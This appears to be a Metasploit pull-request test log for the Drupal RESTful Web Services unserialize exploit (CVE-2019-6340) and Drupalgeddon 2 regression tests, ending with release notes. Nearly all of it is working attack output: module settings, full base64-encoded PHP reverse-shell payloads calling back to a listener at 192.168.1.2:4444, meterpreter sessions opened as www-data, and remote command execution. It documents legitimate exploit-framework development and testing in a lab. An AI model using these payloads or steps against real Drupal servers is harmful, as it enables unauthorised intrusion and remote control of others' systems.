[*] Executing with system(): php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMS4yJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNrKCJO.bGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
[*] Sending GET to /node/1 with link http://127.0.0.1/rest/type/shortcut/default
[!] If you did not get code execution, try a new node ID
[*] Exploit completed, but no session was created.
msf5 exploit(unix/webapp/drupal_restws_unserialize) > set node 2
node => 2
msf5 exploit(unix/webapp/drupal_restws_unserialize) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Drupal 8 targeted at http://127.0.0.1/
[!] CHANGELOG.txt no longer contains patch level
[*] Executing with system(): php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMS4yJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNrKCJO.bGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
[*] Sending GET to /node/2 with link http://127.0.0.1/rest/type/shortcut/default
[*] Sending stage (38247 bytes) to 192.168.1.2
[*] Meterpreter session 3 opened (192.168.1.2:4444 -> 192.168.1.2:56176) at 2019-03-05 20:27:16 -0600

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : 11f5c33da9ec
OS          : Linux 11f5c33da9ec 4.9.93-linuxkit-aufs #1 SMP Wed Jun 6 16:55:56 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >

Also lol: {"message":"No authentication credentials provided."}uid=33(www-data) gid=33(www-data) groups=33(www-data).

[wvu]

drupal_drupalgeddon2 tested for regressions

msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost 192.168.1.2
lhost => 192.168.1.2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       127.0.0.1        yes       The target address range or CIDR identifier
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)


msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check

[*] Drupal 7 targeted at http://127.0.0.1/
[+] Drupal appears unpatched in CHANGELOG.txt
[*] Executing with printf(): 5eYr1O58NTnt4XzvmyKhL14
[+] Drupal is vulnerable to code execution
[+] 127.0.0.1:80 - The target is vulnerable.
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Drupal 7 targeted at http://127.0.0.1/
[+] Drupal appears unpatched in CHANGELOG.txt
[*] Executing with printf(): DUMtLcijPmyU
[+] Drupal is vulnerable to code execution
[*] Executing with assert(): eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMS4yJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNrKCJO.bGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));
[*] Sending stage (38247 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:56366) at 2019-03-05 20:42:59 -0600

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : cf0aace3c2b0
OS          : Linux cf0aace3c2b0 4.9.93-linuxkit-aufs #1 SMP Wed Jun 6 16:55:56 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >
Background session 1? [y/N]
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set target 2
target => 2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set payload cmd/unix/generic
payload => cmd/unix/generic
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set cmd id
cmd => id
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Drupal 7 targeted at http://127.0.0.1/
[+] Drupal appears unpatched in CHANGELOG.txt
[*] Executing with printf(): hihOCEa3C9u1WoBxnSevXgL
[+] Drupal is vulnerable to code execution
[!] Enabling DUMP_OUTPUT for cmd/unix/generic
[*] Executing with passthru(): /bin/echo -ne \\\x69\\\x64|sh
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[{"command":"settings","settings":{"basePath":"\/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"dJtFLXrHAdKsf216MLFtCkCHPrs1whdcmX4DEczkmPM"}},"merge":true},{"command":"insert","method":"replaceWith","selector":null,"data":"","settings":{"basePath":"\/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"dJtFLXrHAdKsf216MLFtCkCHPrs1whdcmX4DEczkmPM"}}}]
[*] Exploit completed, but no session was created.
msf5 exploit(unix/webapp/drupal_drupalgeddon2) >

[wvu]

Release Notes

The unix/webapp/drupal_restws_unserialize exploit module has been added to the framework. This module targets the Drupal SA-CORE-2019-003 remote code execution vulnerability (CVE-2019-6340). Various enhancements to Drupalgeddon 2 and the Drupal mixin have also been added.